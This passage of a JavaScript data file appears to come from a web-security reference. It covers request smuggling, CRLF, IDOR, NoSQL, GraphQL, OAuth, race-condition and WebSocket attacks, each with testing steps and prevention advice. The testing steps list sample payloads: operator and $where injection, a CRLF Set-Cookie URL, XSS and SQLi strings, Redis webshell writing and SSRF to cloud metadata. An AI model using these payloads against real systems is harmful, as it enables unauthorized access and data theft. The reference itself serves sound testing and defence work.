      'Python: import pickle; pickle.dumps(exploit_obj)',
      'Check Java apps using ObjectInputStream, readObject(), XStream, Jackson, Gson',
      'Use Burp Deserialization Scanner extension',
    ],
    prevention: [
      'Never deserialize untrusted data — primary defense',
      'Use language-native, simple data formats (JSON) instead of binary serialization',
      'Java: use a serial filter (JEP 290) to allowlist permitted classes',
      'Implement integrity checks (HMAC) on serialized data before deserialization',
      'Monitor and log deserialization exceptions — unusual errors indicate attack attempts',
    ],
    refs: [
      { label: 'PortSwigger: Deserialization', url: 'https://portswigger.net/web-security/deserialization' },
      { label: 'HackTricks: Deserialization', url: 'https://book.hacktricks.xyz/pentesting-web/deserialization' },
      { label: 'ysoserial', url: 'https://github.com/frohoff/ysoserial' },
      { label: 'OWASP: Deserialization Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html' },
    ],
  },

  smuggling: {
    name: 'HTTP Request Smuggling',
    icon: '📨',
    owasp: 'A07:2021',
    cvss: 'High (8.1)',
    summary: 'HTTP request smuggling exploits discrepancies between how front-end (CDN/proxy) and back-end servers parse HTTP request boundaries, enabling request poisoning, cache poisoning, and bypassing security controls.',
    what: 'When multiple servers disagree on where one HTTP request ends and the next begins (via conflicting Content-Length and Transfer-Encoding headers), an attacker can "smuggle" a partial request that prepends to the next victim\'s request. This can steal credentials, bypass access controls, trigger reflected XSS, and poison server-side caches.',
    types: [
      { name: 'CL.TE', desc: 'Front-end uses Content-Length, back-end uses Transfer-Encoding' },
      { name: 'TE.CL', desc: 'Front-end uses Transfer-Encoding, back-end uses Content-Length' },
      { name: 'TE.TE', desc: 'Both use TE but one can be obfuscated (Transfer-Encoding: xchunked)' },
      { name: 'H2.CL / H2.TE', desc: 'HTTP/2 front-end downgrades to HTTP/1.1 back-end — H2 smuggling' },
    ],
    testing: [
      'Use Burp HTTP Request Smuggler extension for automated detection',
      'Send CL.TE probe: short CL + chunked body with poison data',
      'Send TE.CL probe: chunked encoding with mismatched CL',
      'Timing-based detection: large TE chunk → if delayed, CL.TE confirmed',
      'Confirm with differential response: smuggled prefix affects next request response',
      'Test H2 via Burp\'s HTTP/2 support with h2c smuggling payloads',
    ],
    prevention: [
      'Ensure front-end and back-end use the same HTTP parsing (consistent server stack)',
      'Enable HTTP/2 end-to-end and disable HTTP/1.1 backend downgrade',
      'Reject ambiguous requests with both CL and TE headers',
      'Normalize requests at the proxy layer before forwarding',
      'Use server software that rejects conflicting headers by default',
    ],
    refs: [
      { label: 'PortSwigger: HTTP Smuggling', url: 'https://portswigger.net/web-security/request-smuggling' },
      { label: 'PortSwigger Research: H2 Smuggling', url: 'https://portswigger.net/research/http2' },
      { label: 'HackTricks: HTTP Smuggling', url: 'https://book.hacktricks.xyz/pentesting-web/http-request-smuggling' },
      { label: 'PayloadsAllTheThings: Smuggling', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Request%20Smuggling' },
    ],
  },

  crlf: {
    name: 'CRLF Injection',
    icon: '↵',
    owasp: 'A03:2021',
    cvss: 'Medium (6.1)',
    summary: 'CRLF injection exploits improper handling of carriage return (\\r) and line feed (\\n) characters in HTTP responses, enabling header injection, response splitting, XSS, and cache poisoning.',
    what: 'HTTP headers are separated by CRLF (\\r\\n) sequences. If user input containing CRLF characters is included in HTTP response headers without sanitization, attackers can inject arbitrary headers. This enables setting malicious Set-Cookie headers, injecting XSS via reflected headers, splitting the response into two, or poisoning caches.',
    types: [
      { name: 'Header Injection', desc: 'Inject arbitrary headers via CRLF in URL/parameter' },
      { name: 'Response Splitting', desc: 'Full response split → serve attacker-controlled second response' },
      { name: 'XSS via CRLF', desc: 'Inject Content-Type: text/html + XSS body via CRLF' },
      { name: 'Cache Poisoning', desc: 'Poison CDN cache with injected response via CRLF split' },
      { name: 'Log Injection', desc: 'Inject fake log entries via CRLF in logged parameters' },
    ],
    testing: [
      'Test URL parameters, redirect destinations, user-supplied header values',
      'Try: %0d%0a (CRLF), %0a (LF), %0d (CR), %E5%98%8A%E5%98%8D (UTF-8 encoded)',
      'Inject: ?url=https://target.com%0d%0aSet-Cookie:crlf=injected',
      'Response split: inject %0d%0a%0d%0a<html>XSS</html>',
      'Check Location, X-Redirect, Set-Cookie headers for reflected input',
      'Use Burp CRLF scanner or CRLFuzz tool',
    ],
    prevention: [
      'Strip or encode \\r and \\n characters from all user input used in HTTP headers',
      'Use framework\'s built-in header setting functions (they encode automatically)',
      'Validate redirect URLs — reject URLs containing CRLF sequences',
      'CSP to mitigate XSS impact from response splitting',
    ],
    refs: [
      { label: 'PortSwigger: CRLF Injection', url: 'https://portswigger.net/kb/issues/00200300_http-response-header-injection' },
      { label: 'HackTricks: CRLF Injection', url: 'https://book.hacktricks.xyz/pentesting-web/crlf-0d-0a' },
      { label: 'OWASP: CRLF Injection', url: 'https://owasp.org/www-community/vulnerabilities/CRLF_Injection' },
      { label: 'CRLFuzz Tool', url: 'https://github.com/dwisiswant0/crlfuzz' },
    ],
  },

  idor: {
    name: 'IDOR',
    icon: '🔓',
    owasp: 'A01:2021',
    cvss: 'High (8.1)',
    summary: 'Insecure Direct Object References allow attackers to access or modify data belonging to other users by manipulating identifiers (IDs, GUIDs, usernames) in API requests without proper authorization checks.',
    what: 'IDOR occurs when an application uses user-supplied input to access objects directly without verifying that the requester is authorized. Changing user_id=123 to user_id=124 to view another user\'s data is a classic example. IDOR can be horizontal (same privilege level) or vertical (escalate to higher privilege). Often found in APIs, download endpoints, and profile management.',
    types: [
      { name: 'Horizontal IDOR', desc: 'Access data of other users at same privilege level: /api/user/124/profile' },
      { name: 'Vertical IDOR', desc: 'Access higher-privilege resources: /api/admin/users via normal user' },
      { name: 'GUID/Hash IDOR', desc: 'Predictable or leaked GUIDs used as object references' },
      { name: 'Mass Assignment', desc: 'POST/PUT with extra fields (role:admin) that get saved' },
      { name: 'Indirect IDOR', desc: 'Manipulate secondary identifier (order ID in invoice download)' },
    ],
    testing: [
      'Create two accounts, capture request as user A, change IDs to user B\'s IDs',
      'Look for numeric IDs, GUIDs, usernames in URLs and request bodies',
      'Test all HTTP methods: GET, PUT, DELETE, PATCH with others\' IDs',
      'Check API endpoints: /api/user/{id}, /api/orders/{id}, /files/{id}',
      'Try predictable IDs: increment by 1, try 0, -1, very large numbers',
      'Check for GUID leakage in other API responses or public pages',
    ],
    prevention: [
      'Implement object-level authorization checks for every request (not just route-level)',
      'Use indirect references (session-based mapping of IDs to actual objects)',
      'Prefer non-sequential, unpredictable IDs (UUIDv4) but don\'t rely on obscurity',
      'Log and alert on authorization failures — many IDOR attempts look like normal traffic',
      'Automated testing: use tools like AuthMatrix, Autorize (Burp extension)',
    ],
    refs: [
      { label: 'PortSwigger: IDOR', url: 'https://portswigger.net/web-security/access-control/idor' },
      { label: 'HackTricks: IDOR', url: 'https://book.hacktricks.xyz/pentesting-web/idor' },
      { label: 'OWASP: IDOR Testing', url: 'https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/04-Testing_for_Insecure_Direct_Object_References' },
      { label: 'Autorize Burp Extension', url: 'https://github.com/PortSwigger/autorize' },
    ],
  },

  nosql: {
    name: 'NoSQL Injection',
    icon: '🍃',
    owasp: 'A03:2021',
    cvss: 'High (8.8)',
    summary: 'NoSQL injection exploits query operator injection in MongoDB, CouchDB, and Redis — bypassing authentication, dumping data, or achieving RCE via server-side script execution.',
    what: 'NoSQL databases use non-SQL query languages, but are still vulnerable to injection. MongoDB uses JSON query operators ($gt, $ne, $where) that can be injected in query parameters. If a login checks {username: input, password: input}, injecting {$ne: null} bypasses password checks. $where allows JavaScript execution. Redis and CouchDB have their own injection vectors.',
    types: [
      { name: 'Operator Injection', desc: '{"$ne": null} or {"$gt": ""} to bypass equality checks' },
      { name: '$where JS Injection', desc: '{"$where": "sleep(5000)"} — JS executed server-side in MongoDB' },
      { name: 'Array Operators', desc: '{"$in": ["admin","root"]} — match multiple values' },
      { name: 'CouchDB', desc: 'Manipulate view queries and admin API endpoints' },
      { name: 'Redis RCE', desc: 'CONFIG SET + BGSAVE to write webshell, or gopher:// SSRF to Redis' },
    ],
    testing: [
      'Inject operator in JSON body: {"username": {"$ne": null}, "password": {"$ne": null}}',
      'Try URL params: ?user[$ne]=null — PHP/Express may auto-parse to operator',
      'Test $where: {"$where": "1==1"} vs {"$where": "1==0"} — boolean detection',
      'Time-based: {"$where": "sleep(5000)"} or {"$where": "function(){var d=new Date();while(new Date()-d<5000);}return true;"}',
      'CouchDB /_all_docs, /_users endpoints — check if public',
      'Use NoSQLMap tool for automated MongoDB injection testing',
    ],
    prevention: [
      'Validate and sanitize input before using in queries',
      'Use type checking — ensure username is a string, not an object',
      'Disable $where and JavaScript execution in MongoDB (--noscripting)',
      'Use MongoDB query builders that parameterize input',
      'Require authentication and use ACLs on Redis and CouchDB',
    ],
    refs: [
      { label: 'PortSwigger: NoSQL Injection', url: 'https://portswigger.net/web-security/nosql-injection' },
      { label: 'HackTricks: NoSQL Injection', url: 'https://book.hacktricks.xyz/pentesting-web/nosql-injection' },
      { label: 'PayloadsAllTheThings: NoSQL', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection' },
      { label: 'NoSQLMap Tool', url: 'https://github.com/codingo/NoSQLMap' },
    ],
  },

  graphql: {
    name: 'GraphQL Attacks',
    icon: '◉',
    owasp: 'A03:2021',
    cvss: 'High (7.5–9.8)',
    summary: 'GraphQL endpoints are vulnerable to introspection abuse, injection attacks via arguments, batching for brute force/DoS, SSRF via directives, and authorization bypass through query manipulation.',
    what: 'GraphQL\'s flexible query language introduces unique attack surfaces. Introspection reveals the full schema (types, fields, mutations). Query complexity/nesting attacks can DoS servers. Injections occur when user arguments are passed to SQL/OS calls unsanitized. Batching multiple queries in one request bypasses rate limiting. Field-level authorization is often missing.',
    types: [
      { name: 'Introspection', desc: '__schema, __type queries reveal full API structure including hidden fields' },
      { name: 'Injection', desc: 'SQLi/CMDi/SSTI via GraphQL argument values passed to resolvers' },
      { name: 'Batching/Brute Force', desc: 'Multiple queries in array bypass per-request rate limits' },
      { name: 'DoS via Nesting', desc: 'Deeply nested or circular queries exhaust server resources' },
      { name: 'SSRF via Webhooks', desc: 'Mutation arguments with URL processed server-side' },
      { name: 'Auth Bypass', desc: 'Alias to access fields blocked by direct query, or bypass via fragments' },
    ],
    testing: [
      'Send introspection: {"query": "{__schema{types{name fields{name}}}}"}',
      'Use GraphQL Voyager to visualize schema visually',
      'Test injection in string arguments: {"query": "{user(id: \\"1 OR 1=1\\"){name}}"}',
      'Batch brute force: [{"query":"mutation{login(user:\\"admin\\",pass:\\"a\\")}"}, ...]',
      'Nesting DoS: deeply nested query on relationships',
      'Use InQL Burp extension or graphw00f for fingerprinting',
    ],
    prevention: [
      'Disable introspection in production environments',
      'Implement query depth and complexity limits',
      'Rate limit per operation/field, not just per request (to defeat batching)',
      'Parameterize resolver inputs — never concatenate into SQL/OS commands',
      'Implement field-level authorization in resolvers (not just top-level)',
      'Use query allowlisting (persisted queries) in production',
    ],
    refs: [
      { label: 'PortSwigger: GraphQL', url: 'https://portswigger.net/web-security/graphql' },
      { label: 'HackTricks: GraphQL', url: 'https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql' },
      { label: 'OWASP: GraphQL Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html' },
      { label: 'GraphQL Voyager', url: 'https://github.com/graphql-kit/graphql-voyager' },
      { label: 'InQL Burp Extension', url: 'https://github.com/doyensec/inql' },
    ],
  },

  oauth: {
    name: 'OAuth Attacks',
    icon: '🔐',
    owasp: 'A01:2021',
    cvss: 'High (8.8)',
    summary: 'OAuth 2.0 implementation flaws include redirect_uri manipulation for token theft, missing state parameter enabling CSRF, PKCE downgrade, open redirects chaining, and JWT Bearer grant abuse.',
    what: 'OAuth 2.0 is an authorization framework widely used for social login and API access delegation. Common implementation mistakes allow attackers to steal authorization codes or access tokens, link victim accounts to attacker-controlled ones, or silently re-authenticate victims. Redirect_uri validation is particularly error-prone.',
    types: [
      { name: 'redirect_uri Manipulation', desc: 'Register redirect to attacker domain; steal authorization code/token from URL' },
      { name: 'State CSRF', desc: 'Missing or unvalidated state parameter enables CSRF on OAuth flow' },
      { name: 'PKCE Downgrade', desc: 'Strip code_challenge from auth request to bypass PKCE protection' },
      { name: 'Token Theft', desc: 'Steal access token via Referer header, logs, or open redirect chaining' },
      { name: 'Account Linking CSRF', desc: 'Force victim to link their account to attacker-controlled OAuth identity' },
      { name: 'Implicit Flow Leakage', desc: 'Token in URL fragment leaked via Referer or browser history' },
    ],
    testing: [
      'Test redirect_uri: try adding path (/callback/../attacker), subdomain, different domain',
      'Check state parameter: remove it, reuse it, use predictable value — does it validate?',
      'Test PKCE: remove code_challenge/code_challenge_method — does server still issue code?',
      'Intercept authorization code, use it from different session',
      'Check if authorization code is one-time use',
      'Test open redirect on client app that could leak token via Referer',
    ],
    prevention: [
      'Strict redirect_uri validation — exact match only, no wildcards or path traversal',
      'Require and validate unpredictable state parameter (CSRF protection)',
      'Use PKCE (Proof Key for Code Exchange) for all public clients',
      'Use authorization code flow — avoid implicit flow (token in URL)',
      'Short-lived authorization codes (60 seconds), single-use',
      'Bind authorization code to code_verifier in PKCE flow',
    ],
    refs: [
      { label: 'PortSwigger: OAuth Attacks', url: 'https://portswigger.net/web-security/oauth' },
      { label: 'HackTricks: OAuth', url: 'https://book.hacktricks.xyz/pentesting-web/oauth-to-account-takeover' },
      { label: 'OWASP: OAuth Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/OAuth_Cheat_Sheet.html' },
      { label: 'RFC 6749: OAuth 2.0', url: 'https://datatracker.ietf.org/doc/html/rfc6749' },
      { label: 'OAuth Security BCP (RFC 9700)', url: 'https://datatracker.ietf.org/doc/html/rfc9700' },
    ],
  },

  racecond: {
    name: 'Race Condition Attacks',
    icon: '⚡',
    owasp: 'A04:2021',
    cvss: 'High (7.5–9.8)',
    summary: 'Race conditions exploit timing windows between a check and an action (TOCTOU) or between concurrent requests, enabling limit overrun, double-spend, privilege escalation, and authentication bypass.',
    what: 'Race conditions occur when application behavior depends on the sequence or timing of uncontrollable events. The classic check-then-act pattern (read balance → validate → debit) is vulnerable to parallel execution: two threads both read the balance before either writes, then both debit independently. Modern HTTP/2 and Turbo Intruder techniques allow sub-millisecond synchronization of parallel requests.',
    types: [
      { name: 'Limit Overrun', desc: 'Redeem coupon, apply discount, or cast vote more times than allowed' },
      { name: 'TOCTOU', desc: 'Time-of-check-time-of-use: exploit window between validation and action' },
      { name: 'Double Spend', desc: 'Transfer/withdraw more than balance by racing read-then-write' },
      { name: 'Multi-endpoint', desc: 'Race two different API flows that share state (order + cancel)' },
      { name: 'Auth Bypass', desc: 'Race registration/verification window, token invalidation, or session creation' },
    ],
    testing: [
      'Identify endpoints with single-use limits: coupons, votes, referrals, OTPs',
      'Use Turbo Intruder (Burp) with last-byte sync for sub-10ms jitter',
      'HTTP/2 single-packet attack: multiple requests in one TCP frame (nearly zero jitter)',
      'Python asyncio/aiohttp for programmatic parallel requests',
      'Measure baseline latency — race window must exceed network jitter',
      'Test with 20–50 concurrent requests, look for >1 success responses',
    ],
    prevention: [
      'Atomic database operations: SELECT ... FOR UPDATE, Redis INCR, CAS',
      'Database transactions with proper isolation levels (SERIALIZABLE)',
      'Idempotency keys on mutating API endpoints',
      'Distributed locks (Redis SETNX/Redlock) for cross-service coordination',
      'Verify state after action, not before: mark used → then credit (not check → credit → mark)',
    ],
    refs: [
      { label: 'PortSwigger: Race Conditions', url: 'https://portswigger.net/web-security/race-conditions' },
      { label: 'PortSwigger Research: Smashing the State Machine', url: 'https://portswigger.net/research/smashing-the-state-machine' },
      { label: 'HackTricks: Race Condition', url: 'https://book.hacktricks.xyz/pentesting-web/race-condition' },
      { label: 'Turbo Intruder', url: 'https://portswigger.net/bappstore/9abaa233088242e8be252cd4ff534988' },
      { label: 'PayloadsAllTheThings: Race Condition', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Race%20Condition' },
    ],
  },

  websocket: {
    name: 'WebSocket Attacks',
    icon: '🔌',
    owasp: 'A01:2021',
    cvss: 'High (8.1)',
    summary: 'WebSocket vulnerabilities include Cross-Site WebSocket Hijacking (CSWSH), injection attacks via messages, XSS broadcast, SSRF via upgrade requests, origin bypass, and per-message authentication gaps.',
    what: 'WebSockets provide full-duplex persistent connections. CSWSH is the WebSocket equivalent of CSRF — if the server authenticates via cookies and doesn\'t validate the Origin header, a malicious site can open a WebSocket to the target and communicate as the victim. Message-level injection (SQLi, XSS, SSTI) occurs when WS message content is processed by back-end systems without sanitization.',
    types: [
      { name: 'CSWSH', desc: 'Cross-Site WebSocket Hijacking: open WS from attacker site, steal data as victim' },
      { name: 'Message Injection', desc: 'Inject SQLi, SSTI, CMDi payloads in WebSocket message fields' },
      { name: 'Stored XSS via WS', desc: 'Broadcast XSS payload to all connected clients via chat/notification WS' },
      { name: 'SSRF via Upgrade', desc: 'WS upgrade request targeting internal hosts or cloud metadata' },
      { name: 'Origin Bypass', desc: 'Use null, localhost, or subdomain origin to pass weak origin checks' },
      { name: 'Manipulation', desc: 'Replay, tamper role fields, subprotocol escalation, plaintext MitM' },
    ],
    testing: [
      'Check Origin header validation on WS upgrade — try evil.com, null, localhost',
      'Intercept WS messages in Burp — modify role/privilege fields',
      'Inject XSS: {"message":"<img src=x onerror=alert(1)>"} in chat fields',
      'Inject SQLi: {"username":"admin\'--"} in WS login/search messages',
      'Test SSRF: WS upgrade to http://169.254.169.254/ or internal IPs',
      'Check per-message auth: authenticate WS, then send privileged action messages',
    ],
    prevention: [
      'Validate Origin header on WebSocket upgrade — allowlist permitted origins',
      'Use CSRF tokens in WebSocket handshake URL parameters',
      'Implement per-message authentication for sensitive actions',
      'Use wss:// (TLS) exclusively — never allow ws:// fallback',
      'Apply same input validation to WS messages as HTTP requests',
      'Limit connection counts per IP and message sizes',
    ],
    refs: [
      { label: 'PortSwigger: WebSocket Security', url: 'https://portswigger.net/web-security/websockets' },
      { label: 'PortSwigger: CSWSH', url: 'https://portswigger.net/web-security/websockets/cross-site-websocket-hijacking' },
      { label: 'HackTricks: WebSocket', url: 'https://book.hacktricks.xyz/pentesting-web/cross-site-websocket-hijacking-cswsh' },
      { label: 'OWASP: WebSocket Security', url: 'https://owasp.org/www-community/attacks/Cross-Site_WebSocket_Hijacking' },
      { label: 'PayloadsAllTheThings: WebSocket', url: 'https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Web%20Sockets' },
    ],
  },

};
